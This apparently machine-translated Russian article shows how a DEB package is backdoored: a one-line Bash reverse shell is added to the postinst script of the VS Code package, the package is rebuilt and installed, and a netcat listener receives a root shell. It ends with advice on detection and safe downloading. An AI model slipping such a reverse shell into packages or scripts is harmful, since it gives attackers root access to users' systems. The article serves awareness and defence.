Знаете ли вы, что злоумышленники могут изменить сценарии, упакованные в файл DEB, чтобы получить несанкционированный доступ к вашему компьютеру? Вот как пакеты DEB защищены бэкдором.

Ключевые выводы

  • Пакеты DEB можно легко использовать с помощью бэкдора, что позволяет злоумышленникам внедрить вредоносный код в вашу систему, когда вы устанавливаете их с правами root.
  • Зараженные пакеты DEB трудно обнаружить, поскольку они могут не быть помечены антивирусным программным обеспечением или облачными решениями, такими как VirusTotal.
  • Чтобы защитить себя, избегайте загрузки пакетов DEB со случайных сайтов, используйте официальные сайты загрузки или сайты, пользующиеся доверием сообщества, и рассмотрите возможность установки инструментов безопасности для защиты вашей системы Linux от сети. атаки.

Файлы DEB — это пакеты программного обеспечения, которые являются основным форматом поставки программного обеспечения в дистрибутивах Linux на базе Debian.

Чтобы установить пакеты DEB, вам необходимо использовать менеджер пакетов, например dpkg, с правами root. Злоумышленники пользуются этим и внедряют в эти пакеты бэкдоры. Когда вы устанавливаете их с помощью dpkg или любого другого менеджера пакетов, вредоносный код также запускается вместе с ним и ставит под угрозу вашу систему.

Давайте подробно рассмотрим, как пакеты DEB защищены бэкдором и что вы можете сделать, чтобы защитить себя.

Как пакеты DEB защищены бэкдором?

Прежде чем вы поймете, как пакеты DEB защищены бэкдором, давайте рассмотрим, что находится внутри пакета DEB. Для демонстрации я загружу DEB-пакет Microsoft Visual Studio Code с официального сайта Microsoft. Это тот же пакет, который вы скачаете, если хотите установить VS Code в Linux.

Скачать:Код Visual Studio

Теперь, когда целевой пакет загружен, пришло время его распаковать. Вы можете распаковать пакет DEB, используя команду dpkg-deb команда с помощью флаг, за которым следует путь для хранения содержимого:

dpkg-deb -R

Это должно извлечь содержимое пакета VS Code.

Перейдя в папку, вы обнаружите несколько каталогов, однако нас интересует только ДЕБИАН каталог. Этот каталог содержит сценарии сопровождающего, которые выполняются во время установки с правами root. Как вы уже могли догадаться, злоумышленники модифицируют скрипты в этом каталоге.

Для демонстрации я изменю постинст скрипт и добавьте простую однострочную обратную TCP-оболочку Bash. Как следует из названия, это сценарий, который выполняется после установки пакета в системе.

Он содержит команды, которые завершают настройки, такие как настройка символических ссылок, обработка зависимостей и многое другое. В Интернете можно найти массу различных обратных снарядов. Большинство из них будут работать одинаково. Вот пример однострочника обратной оболочки:

bash -i >& /dev/tcp/127.0.0.1/42069 0>&1

Пояснение команды:

  • баш: Это команда, которая вызывает оболочку Bash.
  • -я: Флаг указывает Bash работать в интерактивном режиме, позволяя выполнять ввод-вывод команд в реальном времени.
  • >& /dev/tcp/ip/порт: Это перенаправляет стандартный вывод и стандартная ошибка к сетевому сокету, по существу устанавливая TCP-соединение с и .
  • 0>&1: Это перенаправляет ввод и вывод в одно и то же место, то есть в сетевой сокет.

Для непосвященных: обратная оболочка — это тип кода, который при выполнении на целевой машине инициирует обратное соединение с машиной злоумышленника. Обратные оболочки — отличный способ обойти ограничения брандмауэра, поскольку трафик генерируется с компьютера, находящегося за брандмауэром.

Вот как выглядит модифицированный скрипт:

Как видите, всё то же самое, но добавлена ​​только одна строка — наш обратный шелл Bash. Теперь вам нужно собрать файлы обратно в ".деб"формат. Просто используйте ДПКГ команда с помощью --строить пометить или использовать dpkg-deb с флаг, за которым следует путь к извлеченному содержимому:

dpkg --build 
dpkg-deb -b

Теперь пакет DEB с бэкдором готов к отправке на вредоносные сайты. Давайте смоделируем сценарий, в котором жертва загрузила пакет DEB в свою систему и устанавливает его как любой другой обычный пакет.

Верхняя панель терминала предназначена для точки зрения жертвы, а нижняя — для точки зрения злоумышленника. Жертва устанавливает пакет с судо dpkg -i и злоумышленник терпеливо прослушивает входящие соединения, используя неткэт команда в Linux.

Как только установка завершится, обратите внимание, что злоумышленник получает обратное соединение с оболочкой и теперь имеет root-доступ к системе жертвы. Теперь вы знаете, как пакеты DEB защищены бэкдором. Давайте теперь узнаем, как можно защитить себя.

Как определить, является ли пакет DEB вредоносным

Теперь, когда вы знаете, что зараженные пакеты DEB — это вещь, вам, должно быть, интересно, как найти зараженные пакеты. Для начала можно попробовать использовать антивирусное программное обеспечение Linux как КламАВ. К сожалению, при сканировании пакета ClamAV он не пометил его как вредоносный. Вот результат сканирования:

Поэтому, если у вас нет антивирусного решения премиум-класса (что не является гарантией того, что вас не взломают), обнаружить вредоносные пакеты DEB довольно сложно. Давайте попробуем использовать облачное решение, такое как сайт VirusTotal:

Как видите, VirusTotal не обнаружил в нем ничего плохого. Что ж, единственный способ защитить себя от таких угроз — это соблюдать базовые правила безопасности, например, всегда избегать загрузки файлов из неизвестных источников. проверка хеша файлаи вообще избегайте установки сомнительного программного обеспечения.

Интернет полон подобных угроз. Единственный способ путешествовать по Интернету, не теряя своих данных, — это сохранять самообладание и просматривать надежные сайты. Кроме того, для Linux вам также следует попытаться выяснить, имеет ли загружаемое вами программное обеспечение Вариант AppImage поскольку они автономны и могут быть помещены в песочницу и, таким образом, не иметь контакта с вашей системой.

Не загружайте пакеты DEB со случайных сайтов!

Пакеты DEB по своей сути не так уж и плохи, однако злоумышленники могут легко превратить их в оружие и отправить ничего не подозревающим пользователям. Как было продемонстрировано, пакет DEB можно легко открыть и изменить для добавления собственного кода с помощью всего лишь нескольких команд, что делает его распространенным вектором распространения вредоносного ПО.

Даже простые бэкдоры в пакетах DEB остаются незамеченными лучшими антивирусными решениями. Поэтому лучше всего действовать осторожно, руководствоваться здравым смыслом при работе в Интернете и всегда загружать программное обеспечение только с официальных сайтов загрузки или сайтов, пользующихся доверием сообщества.

Теперь, когда вы знаете о рисках безопасности, связанных с установкой пакетов DEB с новых или неизвестных сайтов, вам следует соблюдать осторожность при установке нового программного обеспечения. Однако просто внимательно относиться к тому, что вы устанавливаете, недостаточно. Ваша система Linux также может стать объектом сетевых атак.

Чтобы обеспечить свою безопасность в случае сетевой атаки, вам следует рассмотреть возможность установки инструментов сетевой безопасности.